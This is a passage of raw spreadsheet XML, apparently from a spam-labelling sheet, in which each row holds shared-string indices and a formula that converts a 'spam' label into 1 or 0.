    <row r="3219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3219" t="s">
        <v>8343</v>
      </c>
      <c r="B3219" t="s">
        <v>5294</v>
      </c>
      <c r="C3219" s="1">
        <f>IF(B3219="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3220" t="s">
        <v>8344</v>
      </c>
      <c r="B3220" t="s">
        <v>5294</v>
      </c>
      <c r="C3220" s="1">
        <f>IF(B3220="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3221" t="s">
        <v>8345</v>
      </c>
      <c r="B3221" t="s">
        <v>5294</v>
      </c>
      <c r="C3221" s="1">
        <f>IF(B3221="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3222" t="s">
        <v>8346</v>
      </c>
      <c r="B3222" t="s">
        <v>5297</v>
      </c>
      <c r="C3222" s="1">
        <f>IF(B3222="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3223" t="s">
        <v>8347</v>
      </c>
      <c r="B3223" t="s">
        <v>5294</v>
      </c>
      <c r="C3223" s="1">
        <f>IF(B3223="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3224" t="s">
        <v>8348</v>
      </c>
      <c r="B3224" t="s">
        <v>5294</v>
      </c>
      <c r="C3224" s="1">
        <f>IF(B3224="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3225" t="s">
        <v>8349</v>
      </c>
      <c r="B3225" t="s">
        <v>5294</v>
      </c>
      <c r="C3225" s="1">
        <f>IF(B3225="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3226" t="s">
        <v>8350</v>
      </c>
      <c r="B3226" t="s">
        <v>5294</v>
      </c>
      <c r="C3226" s="1">
        <f>IF(B3226="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3227" t="s">
        <v>8351</v>
      </c>
      <c r="B3227" t="s">
        <v>5294</v>
      </c>
      <c r="C3227" s="1">
        <f>IF(B3227="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3228" t="s">
        <v>6166</v>
      </c>
      <c r="B3228" t="s">
        <v>5294</v>
      </c>
      <c r="C3228" s="1">
        <f>IF(B3228="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3229" t="s">
        <v>5307</v>
      </c>
      <c r="B3229" t="s">
        <v>5297</v>
      </c>
      <c r="C3229" s="1">
        <f>IF(B3229="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3230" t="s">
        <v>8352</v>
      </c>
      <c r="B3230" t="s">
        <v>5297</v>
      </c>
      <c r="C3230" s="1">
        <f>IF(B3230="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3231" t="s">
        <v>8353</v>
      </c>
      <c r="B3231" t="s">
        <v>5294</v>
      </c>
      <c r="C3231" s="1">
        <f>IF(B3231="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3232" t="s">
        <v>8354</v>
      </c>
      <c r="B3232" t="s">
        <v>5294</v>
      </c>
      <c r="C3232" s="1">
        <f>IF(B3232="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3233" t="s">
        <v>8355</v>
      </c>
      <c r="B3233" t="s">
        <v>5294</v>
      </c>
      <c r="C3233" s="1">
        <f>IF(B3233="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3234" t="s">
        <v>8356</v>
      </c>
      <c r="B3234" t="s">
        <v>5294</v>
      </c>
      <c r="C3234" s="1">
        <f>IF(B3234="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3235" t="s">
        <v>8357</v>
      </c>
      <c r="B3235" t="s">
        <v>5294</v>
      </c>
      <c r="C3235" s="1">
        <f>IF(B3235="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3236" t="s">
        <v>8358</v>
      </c>
      <c r="B3236" t="s">
        <v>5294</v>
      </c>
      <c r="C3236" s="1">
        <f>IF(B3236="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3237" t="s">
        <v>8359</v>
      </c>
      <c r="B3237" t="s">
        <v>5294</v>
      </c>
      <c r="C3237" s="1">
        <f>IF(B3237="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3238" t="s">
        <v>8360</v>
      </c>
      <c r="B3238" t="s">
        <v>5294</v>
      </c>
      <c r="C3238" s="1">
        <f>IF(B3238="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3239" t="s">
        <v>8361</v>
      </c>
      <c r="B3239" t="s">
        <v>5294</v>
      </c>
      <c r="C3239" s="1">
        <f>IF(B3239="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3240" t="s">
        <v>8362</v>
      </c>
      <c r="B3240" t="s">
        <v>5294</v>
      </c>
      <c r="C3240" s="1">
        <f>IF(B3240="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3241" t="s">
        <v>8363</v>
      </c>
      <c r="B3241" t="s">
        <v>5294</v>
      </c>
      <c r="C3241" s="1">
        <f>IF(B3241="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3242" t="s">
        <v>8364</v>
      </c>
      <c r="B3242" t="s">
        <v>5294</v>
      </c>
      <c r="C3242" s="1">
        <f>IF(B3242="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3243" t="s">
        <v>6113</v>
      </c>
      <c r="B3243" t="s">
        <v>5294</v>
      </c>
      <c r="C3243" s="1">
        <f>IF(B3243="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3244" t="s">
        <v>8365</v>
      </c>
      <c r="B3244" t="s">
        <v>5294</v>
      </c>
      <c r="C3244" s="1">
        <f>IF(B3244="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3245" t="s">
        <v>8366</v>
      </c>
      <c r="B3245" t="s">
        <v>5294</v>
      </c>
      <c r="C3245" s="1">
        <f>IF(B3245="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3246" t="s">
        <v>8367</v>
      </c>
      <c r="B3246" t="s">
        <v>5294</v>
      </c>
      <c r="C3246" s="1">
        <f>IF(B3246="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3247" t="s">
        <v>8368</v>
      </c>
      <c r="B3247" t="s">
        <v>5294</v>
      </c>
      <c r="C3247" s="1">
        <f>IF(B3247="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3248" t="s">
        <v>8369</v>
      </c>
      <c r="B3248" t="s">
        <v>5294</v>
      </c>
      <c r="C3248" s="1">
        <f>IF(B3248="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3249" t="s">
        <v>8370</v>
      </c>
      <c r="B3249" t="s">
        <v>5294</v>
      </c>
      <c r="C3249" s="1">
        <f>IF(B3249="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3250" t="s">
        <v>7114</v>
      </c>
      <c r="B3250" t="s">
        <v>5294</v>
      </c>
      <c r="C3250" s="1">
        <f>IF(B3250="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3251" t="s">
        <v>8371</v>
      </c>
      <c r="B3251" t="s">
        <v>5294</v>
      </c>
      <c r="C3251" s="1">
        <f>IF(B3251="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3252" t="s">
        <v>8372</v>
      </c>
      <c r="B3252" t="s">
        <v>5294</v>
      </c>
      <c r="C3252" s="1">
        <f>IF(B3252="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3253" t="s">
        <v>8373</v>
      </c>
      <c r="B3253" t="s">
        <v>5294</v>
      </c>
      <c r="C3253" s="1">
        <f>IF(B3253="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3254" t="s">
        <v>8374</v>
      </c>
      <c r="B3254" t="s">
        <v>5294</v>
      </c>
      <c r="C3254" s="1">
        <f>IF(B3254="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3255" t="s">
        <v>8375</v>
      </c>
      <c r="B3255" t="s">
        <v>5294</v>
      </c>
      <c r="C3255" s="1">
        <f>IF(B3255="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3256" t="s">
        <v>8376</v>
      </c>
      <c r="B3256" t="s">
        <v>5294</v>
      </c>
      <c r="C3256" s="1">
        <f>IF(B3256="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3257" t="s">
        <v>8377</v>
      </c>
      <c r="B3257" t="s">
        <v>5294</v>
      </c>
      <c r="C3257" s="1">
        <f>IF(B3257="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3258" t="s">
        <v>8378</v>
      </c>
      <c r="B3258" t="s">
        <v>5294</v>
      </c>
      <c r="C3258" s="1">
        <f>IF(B3258="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3259" t="s">
        <v>8379</v>
      </c>
      <c r="B3259" t="s">
        <v>5294</v>
      </c>
      <c r="C3259" s="1">
        <f>IF(B3259="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3260" t="s">
        <v>8380</v>
      </c>
      <c r="B3260" t="s">
        <v>5297</v>
      </c>
      <c r="C3260" s="1">
        <f>IF(B3260="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3261" t="s">
        <v>8381</v>
      </c>
      <c r="B3261" t="s">
        <v>5294</v>
      </c>
      <c r="C3261" s="1">
        <f>IF(B3261="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3262" t="s">
        <v>8382</v>
      </c>
      <c r="B3262" t="s">
        <v>5294</v>
      </c>
      <c r="C3262" s="1">
        <f>IF(B3262="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3263" t="s">
        <v>8383</v>
      </c>
      <c r="B3263" t="s">
        <v>5294</v>
      </c>
      <c r="C3263" s="1">
        <f>IF(B3263="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3264" t="s">
        <v>8384</v>
      </c>
      <c r="B3264" t="s">
        <v>5294</v>
      </c>
      <c r="C3264" s="1">
        <f>IF(B3264="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3265" t="s">
        <v>8385</v>
      </c>
      <c r="B3265" t="s">
        <v>5294</v>
      </c>
      <c r="C3265" s="1">
        <f>IF(B3265="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3266" t="s">
        <v>8386</v>
      </c>
      <c r="B3266" t="s">
        <v>5297</v>
      </c>
      <c r="C3266" s="1">
        <f>IF(B3266="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3267" t="s">
        <v>8387</v>
      </c>
      <c r="B3267" t="s">
        <v>5294</v>
      </c>
      <c r="C3267" s="1">
        <f>IF(B3267="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3268" t="s">
        <v>8388</v>
      </c>
      <c r="B3268" t="s">
        <v>5294</v>
      </c>
      <c r="C3268" s="1">
        <f>IF(B3268="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3269" t="s">
        <v>8389</v>
      </c>
      <c r="B3269" t="s">
        <v>5294</v>
      </c>
      <c r="C3269" s="1">
        <f>IF(B3269="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3270" t="s">
        <v>8390</v>
      </c>
      <c r="B3270" t="s">
        <v>5294</v>
      </c>
      <c r="C3270" s="1">
        <f>IF(B3270="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3271" t="s">
        <v>8391</v>
      </c>
      <c r="B3271" t="s">
        <v>5294</v>
      </c>
      <c r="C3271" s="1">
        <f>IF(B3271="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3272" t="s">
        <v>6479</v>
      </c>
      <c r="B3272" t="s">
        <v>5297</v>
      </c>
      <c r="C3272" s="1">
        <f>IF(B3272="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3273" t="s">
        <v>8392</v>
      </c>
      <c r="B3273" t="s">
        <v>5294</v>
      </c>
      <c r="C3273" s="1">
        <f>IF(B3273="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3274" t="s">
        <v>8393</v>
      </c>
      <c r="B3274" t="s">
        <v>5294</v>
      </c>
      <c r="C3274" s="1">
        <f>IF(B3274="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3275" t="s">
        <v>8394</v>
      </c>
      <c r="B3275" t="s">
        <v>5294</v>
      </c>
      <c r="C3275" s="1">
        <f>IF(B3275="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3276" t="s">
        <v>8395</v>
      </c>
      <c r="B3276" t="s">
        <v>5294</v>
      </c>
      <c r="C3276" s="1">
        <f>IF(B3276="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3277" t="s">
        <v>8396</v>
      </c>
      <c r="B3277" t="s">
        <v>5294</v>
      </c>
      <c r="C3277" s="1">
        <f>IF(B3277="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3278" t="s">
        <v>8397</v>
      </c>
      <c r="B3278" t="s">
        <v>5294</v>
      </c>
      <c r="C3278" s="1">
        <f>IF(B3278="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3279" t="s">
        <v>8398</v>
      </c>
      <c r="B3279" t="s">
        <v>5294</v>
      </c>
      <c r="C3279" s="1">
        <f>IF(B3279="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3280" t="s">
        <v>7604</v>
      </c>
      <c r="B3280" t="s">
        <v>5294</v>
      </c>
      <c r="C3280" s="1">
        <f>IF(B3280="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3281" t="s">
        <v>8399</v>
      </c>
      <c r="B3281" t="s">
        <v>5294</v>
      </c>
      <c r="C3281" s="1">
        <f>IF(B3281="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3282" t="s">
        <v>8400</v>
      </c>
      <c r="B3282" t="s">
        <v>5294</v>
      </c>
      <c r="C3282" s="1">
        <f>IF(B3282="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3283" t="s">
        <v>8401</v>
      </c>
      <c r="B3283" t="s">
        <v>5294</v>
      </c>
      <c r="C3283" s="1">
        <f>IF(B3283="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3284" t="s">
        <v>8402</v>
      </c>
      <c r="B3284" t="s">
        <v>5294</v>
      </c>
      <c r="C3284" s="1">
        <f>IF(B3284="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3285" t="s">
        <v>8403</v>
      </c>
      <c r="B3285" t="s">
        <v>5294</v>
      </c>
      <c r="C3285" s="1">
        <f>IF(B3285="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3286" t="s">
        <v>8404</v>
      </c>
      <c r="B3286" t="s">
        <v>5294</v>
      </c>
      <c r="C3286" s="1">
        <f>IF(B3286="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3287" t="s">
        <v>8405</v>
      </c>
      <c r="B3287" t="s">
        <v>5294</v>
      </c>
      <c r="C3287" s="1">
        <f>IF(B3287="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3288" t="s">
        <v>8406</v>
      </c>
      <c r="B3288" t="s">
        <v>5294</v>
      </c>
      <c r="C3288" s="1">
        <f>IF(B3288="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3289" t="s">
        <v>8407</v>
      </c>
      <c r="B3289" t="s">
        <v>5297</v>
      </c>
      <c r="C3289" s="1">
        <f>IF(B3289="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3290" t="s">
        <v>8408</v>
      </c>
      <c r="B3290" t="s">
        <v>5297</v>
      </c>
      <c r="C3290" s="1">
        <f>IF(B3290="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3291" t="s">
        <v>8409</v>
      </c>
      <c r="B3291" t="s">
        <v>5294</v>
      </c>
      <c r="C3291" s="1">
        <f>IF(B3291="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3292" t="s">
        <v>8410</v>
      </c>
      <c r="B3292" t="s">
        <v>5294</v>
      </c>
      <c r="C3292" s="1">
        <f>IF(B3292="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3293" t="s">
        <v>8411</v>
      </c>
      <c r="B3293" t="s">
        <v>5294</v>
      </c>
      <c r="C3293" s="1">
        <f>IF(B3293="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3294" t="s">
        <v>8412</v>
      </c>
      <c r="B3294" t="s">
        <v>5294</v>
      </c>
      <c r="C3294" s="1">
        <f>IF(B3294="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3295" t="s">
        <v>8413</v>
      </c>
      <c r="B3295" t="s">
        <v>5294</v>
      </c>
      <c r="C3295" s="1">
        <f>IF(B3295="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3296" t="s">
        <v>8414</v>
      </c>
      <c r="B3296" t="s">
        <v>5294</v>
      </c>
      <c r="C3296" s="1">
        <f>IF(B3296="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3297" t="s">
        <v>8415</v>
      </c>
      <c r="B3297" t="s">
        <v>5294</v>
      </c>
      <c r="C3297" s="1">
        <f>IF(B3297="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3298" t="s">
        <v>8416</v>
      </c>
      <c r="B3298" t="s">
        <v>5297</v>
      </c>
      <c r="C3298" s="1">
        <f>IF(B3298="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3299" t="s">
        <v>8417</v>
      </c>
      <c r="B3299" t="s">
        <v>5297</v>
      </c>
      <c r="C3299" s="1">
        <f>IF(B3299="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3300" t="s">
        <v>7191</v>
      </c>
      <c r="B3300" t="s">
        <v>5294</v>
      </c>
      <c r="C3300" s="1">
        <f>IF(B3300="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3301" t="s">
        <v>8418</v>
      </c>
      <c r="B3301" t="s">
        <v>5294</v>
      </c>
      <c r="C3301" s="1">
        <f>IF(B3301="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3302" t="s">
        <v>8419</v>
      </c>
      <c r="B3302" t="s">
        <v>5297</v>
      </c>
      <c r="C3302" s="1">
        <f>IF(B3302="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3303" t="s">
        <v>8420</v>
      </c>
      <c r="B3303" t="s">
        <v>5294</v>
      </c>
      <c r="C3303" s="1">
        <f>IF(B3303="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3304" t="s">
        <v>8421</v>
      </c>
      <c r="B3304" t="s">
        <v>5294</v>
      </c>
      <c r="C3304" s="1">
        <f>IF(B3304="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3305" t="s">
        <v>8422</v>
      </c>
      <c r="B3305" t="s">
        <v>5294</v>
      </c>
      <c r="C3305" s="1">
        <f>IF(B3305="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3306" t="s">
        <v>8423</v>
      </c>
      <c r="B3306" t="s">
        <v>5294</v>
      </c>
      <c r="C3306" s="1">
        <f>IF(B3306="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3307" t="s">
        <v>8424</v>
      </c>
      <c r="B3307" t="s">
        <v>5294</v>
      </c>
      <c r="C3307" s="1">
        <f>IF(B3307="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3308" t="s">
        <v>8425</v>
      </c>
      <c r="B3308" t="s">
        <v>5294</v>
      </c>
      <c r="C3308" s="1">
        <f>IF(B3308="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3309" t="s">
        <v>8426</v>
      </c>
      <c r="B3309" t="s">
        <v>5294</v>
      </c>
      <c r="C3309" s="1">
        <f>IF(B3309="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3310" t="s">
        <v>8427</v>
      </c>
      <c r="B3310" t="s">
        <v>5294</v>
      </c>
      <c r="C3310" s="1">
        <f>IF(B3310="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3311" t="s">
        <v>6539</v>
      </c>
      <c r="B3311" t="s">
        <v>5294</v>
      </c>
      <c r="C3311" s="1">
        <f>IF(B3311="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3312" t="s">
        <v>8428</v>
      </c>
      <c r="B3312" t="s">
        <v>5294</v>
      </c>
      <c r="C3312" s="1">
        <f>IF(B3312="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3313" t="s">
        <v>8429</v>
      </c>
      <c r="B3313" t="s">
        <v>5294</v>
      </c>
      <c r="C3313" s="1">
        <f>IF(B3313="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3314" t="s">
        <v>8430</v>
      </c>
      <c r="B3314" t="s">
        <v>5294</v>
      </c>
      <c r="C3314" s="1">
        <f>IF(B3314="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3315" t="s">
        <v>8431</v>
      </c>
      <c r="B3315" t="s">
        <v>5294</v>
      </c>
      <c r="C3315" s="1">
        <f>IF(B3315="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3316" t="s">
        <v>5774</v>
      </c>
      <c r="B3316" t="s">
        <v>5297</v>
      </c>
      <c r="C3316" s="1">
        <f>IF(B3316="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3317" t="s">
        <v>8432</v>
      </c>
      <c r="B3317" t="s">
        <v>5294</v>
      </c>
      <c r="C3317" s="1">
        <f>IF(B3317="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3318" t="s">
        <v>8433</v>
      </c>
      <c r="B3318" t="s">
        <v>5294</v>
      </c>
      <c r="C3318" s="1">
        <f>IF(B3318="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3319" t="s">
        <v>8434</v>
      </c>
      <c r="B3319" t="s">
        <v>5294</v>
      </c>
      <c r="C3319" s="1">
        <f>IF(B3319="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3320" t="s">
        <v>8435</v>
      </c>
      <c r="B3320" t="s">
        <v>5294</v>
      </c>
      <c r="C3320" s="1">
        <f>IF(B3320="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3321" t="s">
        <v>8436</v>
      </c>
      <c r="B3321" t="s">
        <v>5294</v>
      </c>
      <c r="C3321" s="1">
        <f>IF(B3321="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3322" t="s">
        <v>8437</v>
      </c>
      <c r="B3322" t="s">
        <v>5294</v>
      </c>
      <c r="C3322" s="1">
        <f>IF(B3322="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
